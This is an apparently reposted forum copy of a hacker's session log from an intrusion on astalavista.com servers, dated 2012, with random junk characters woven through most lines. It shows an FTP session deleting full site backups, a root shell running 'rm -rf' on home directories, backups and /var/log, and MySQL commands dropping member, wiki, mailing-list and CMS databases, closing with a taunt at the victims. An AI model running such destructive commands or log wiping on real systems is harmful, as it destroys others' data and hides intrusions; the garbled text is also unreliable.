150 Opening BINARY mode data connection for ‘file list’./ n) O3 o" V3 B+ u3 k2 k0 p
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com7 C5 P. h: R* G- u6 z. z
226 Transfer complete.
6 y+ d2 N4 j: u* a( nftp> cd astalavista.com
& _! ?% z# ?2 X! w9 S2 s250 CWD command successful.! P7 ?8 r2 Z# ] V8 [! C
ftp> ls -la
2 y; ^2 a( S5 A* ?0 L227 Entering Passive Mode (212,254,194,163,2,189)
9 ~2 K! B9 N6 u4 O% b0 l150 Opening BINARY mode data connection for ‘file list’.9 e# z; z* f. _. g" b! }. f: h; t
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar) V) n- [1 s1 {5 h- H
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2+ N( J+ a% P! y7 Q- Z7 v: O! y4 {# T
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
# a% ]* B7 S4 a9 a8 _/ g. z0 x-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
7 E* v2 A) p b' G-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
4 a2 `$ Z) Q1 e5 u& e[snip]2 r3 E8 f; y% @# I
226 Transfer complete.3 o" a; [( k9 {* M
ftp> mdelete *. i; o q1 I) j) I1 e
ftp> ls -la3 V5 I/ J4 Y4 w9 G8 w) E
227 Entering Passive Mode (212,254,194,163,2,193)
0 v" Q" ?' Y: ^4 i2 X150 Opening BINARY mode data connection for ‘file list’.
+ p1 V1 d/ r: n2 C1 E" \: q226 Transfer complete.
u |: v' t% Y4 p6 i* t0 Lftp>, t3 g- u4 ]( Y' t
7 C* O a( ~" N$ Zsh-3.2# cd /home
( N* L4 ?8 `6 gsh-3.2# ls -la
% m; P8 ?3 l( T! h3 ?- _. utotal 1203 {3 a# w, @+ z
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .* m# W" s0 b. @! ?; i! }; o
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..* j( j& [6 \( e" {$ F# G4 Y3 @* j
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
1 m K" Z& w! v4 T' w, m-rw——- 1 root root 8192 Jun 4 03:03 aquota.group8 G$ w0 W. }4 t' D
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
4 V4 G; i5 U7 Y$ t% tdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
- ? C: R/ I& c w, {1 w$ Odrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
E; {' y5 l8 v# w- ^6 rdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
0 K1 a. B0 L: @& X. O3 wdrwx–x–x 10 com com 4096 Apr 28 12:40 com
+ S+ _1 i8 Z. }5 h9 l( q: a( wdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
% m3 C* V% \& T M% Bdrwx—— 3 jon jon 4096 Sep 21 2007 jon" _- L; G, b. Q' x7 o% e- o) W+ Q
drwx—— 2 root root 16384 Sep 11 2007 lost+found& B- i; r+ v0 v3 Y' U* j
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
$ j! ]2 w2 Q7 Ndrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata8 }8 Y9 H' r; v/ x/ `/ b# j+ ^4 n
drwx—— 2 jon jon 4096 Sep 15 2007 test$ Q3 O' n: z ~' ~6 X' k1 c6 m
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
* F1 {4 W' G+ X0 u* r) x) B" V
4 h, ~9 ?7 {5 \9 u6 j, dsh-3.2# rm -rf backup/
|8 i, H. E# P$ Y% l1 Qsh-3.2# rm -rf backup.14161/
/ A! s9 N8 U9 G; M7 N" `sh-3.2# rm -rf ftp/- g" C p9 X$ V6 Q! f" H* v" ~) J
sh-3.2# rm -rf jon/" v' b& O B7 K) K! V. Y. n
sh-3.2# rm -rf my/3 H5 _6 |0 @# q L6 F! o
sh-3.2# rm -rf mysqldata/
! c; [. ]) u7 x2 ^2 h* Esh-3.2# rm -rf test/* A% F! P! A7 k
sh-3.2# rm -rf tmp/
" f0 i [+ z4 r3 |8 M3 S) Ksh-3.2# cd ~" c: i. ^6 y% J
sh-3.2# rm -rf *! [( b6 |4 {- v$ V8 K" w
sh-3.2# rm -rf /var/log/
: n4 j5 K5 [+ |& R. a# z) _) O9 Mrm: cannot remove directory `/var/log//proftpd’: Directory not empty
# R' _; l4 ]3 n$ S5 P, h$ d9 Dsh-3.2# rm -rf /home/*
% m( N9 r% J1 s2 }sh-3.2# mysql- f$ |) |, ]* y& ~) M0 e2 l: a
Welcome to the MySQL monitor. Commands end with ; or \g." s U% w1 A9 g
Your MySQL connection id is 4071566 S; w8 m7 V2 \0 w
Server version: 5.0.45-community-log MySQL Community Edition (GPL)& ]8 A/ e) G9 A; j8 y$ f
A! H# X+ _+ S" L) ZType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.' \5 n2 ?4 y0 H" l( O @
& t3 y0 E6 e- r" x
mysql> show databases;# R$ ]1 Q# n3 x0 L! [# d j/ t
+———————–+3 e1 j( u$ h% z+ e
| Database |
# _0 J9 M- h( d% a2 ~0 n2 I/ F+———————–+" L D* i& D5 {6 ]8 ?
| information_schema |
; b$ d+ X( T' T N8 K* o| astanet_ads |' M0 M5 o' ~# k4 i3 j) L. K) B
| astanet_mailing_lists |+ p0 l6 o+ Y# ]
| astanet_mediawiki |
, |! l9 z3 Z* [) E; g| astanet_membersystem |6 O- C( n* D5 X/ O5 F, m. T
| com_contrexx |; E4 c; f! h& D
| com_contrexx2 |
$ z( l: V4 e5 R( Q6 i6 Z| com_contrexx2_live |' p9 Q' ^; A# y' G! H
| da_roundcube |
- c$ R' z# e# L: W% X9 U1 R| dolphin |5 I! g8 t9 w% \) T. Q2 I
| ideapool |
) `1 Q* n' a) O0 s* d* I| mysql |
* L! x# L- E# L2 c| test |
% o9 e& Q" E+ t3 B. C9 n- P| yourmaster |
; c+ W h \( L7 f1 C: K$ @- n+———————–+
0 _3 M- W* E' O% {0 q2 c b+ ~14 rows in set (0.03 sec)
0 |: c$ j2 g8 c$ `1 S. h. [* m
. l0 |# U: {) i; w* R8 smysql> drop database astanet_membersystem;
7 U' z3 B2 U& n# k. fdroQuery OK, 46 rows affected (0.81 sec)6 i# @' J" e6 W1 a' t
/ e: W7 Q/ a" V6 @+ u4 Lmysql> drop database com_contrexx;7 J# v d) }& L6 e) E4 W' w' h" s" S
Query OK, 211 rows affected (2.72 sec)# i1 H# J' I8 n) d+ {+ j8 ]! {# {* P6 ]# i
; R# q( W2 N4 J) B- Y/ Fmysql> drop database com_contrexx2;
5 y% p' ]- v! ]( \/ v# mQuery OK, 237 rows affected (2.23 sec)
p6 ] W5 g9 B; J7 I. n; T5 d9 d0 E. x" A" _
mysql> drop database com_contrexx2_live;
9 I7 g( i+ n+ } U9 KQuery OK, 227 rows affected (7.63 sec)
3 l! R# G( J6 v$ b! h! ?/ x% V) u, T* l! I5 @, D; z- ~
mysql> drop database ideapool;) ^1 w5 R! f( G' i3 w4 M( r
Query OK, 69 rows affected (0.19 sec)5 ~ B4 \1 G6 @
$ M. p9 E/ }( H$ V0 L4 l) I! smysql> drop database yourmaster;
, @' a. ^! R6 z* s) P, i4 oQuery OK, 158 rows affected (0.55 sec)
9 j1 S( Z# q2 \" e) g' n
' |& V4 T W2 O4 t9 ?* Dmysql> drop database astanet_ads;
$ e( Q& b) ^" V7 J5 K/ MQuery OK, 9 rows affected (0.11 sec)( h8 Z7 G Z) e6 I+ T" m
5 j+ A; d4 {! h. R2 h4 k
mysql> drop database astanet_mailing_lists;+ ]7 t+ u: g+ }
Query OK, 24 rows affected (1.47 sec)
$ S; e" }5 [# Q' \; A
0 I+ `9 ~1 w% n. jmysql> drop database astanet_mediawiki;
# H! n, O& c) l1 G/ AQuery OK, 31 rows affected (0.51 sec), j2 K; H% a/ o( K
/ i% I% v& v: o; E
mysql> show databases;
3 G+ ?1 X' V9 ~+——————–+& b6 ^: C: q& Y/ K7 `/ H
| Database |- G7 l7 ?' S3 u, e7 I1 ?4 l- b
+——————–+( V" L" [% Y X' J
| information_schema |& o4 \/ C8 Q. Q4 b) j3 H
| da_roundcube |
. |' A; n# [$ `0 g' ^2 ?| dolphin |
. _7 w3 g3 X4 F6 D+ ~| mysql |( `( Y1 L, t6 @
| test |
+ k4 i- Z9 N1 f( E) V/ Q( a+——————–+) Q7 O; N9 H1 l, Q
5 rows in set (0.00 sec)* {9 o% W$ T. @9 U q
6 h1 x: j* O% p& l
What a journey! We’re not sure exactly why the “Terminator” had any influence on1 u2 A; w( F( j: b5 H$ e7 |, L) z$ d
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
6 C" p, I1 H8 X: @, [wrong to say this pack of morons *wont be back*.
; D: ]: g x! W. p |
发表于 2012-11-6 21:07:34
收藏
支持
反对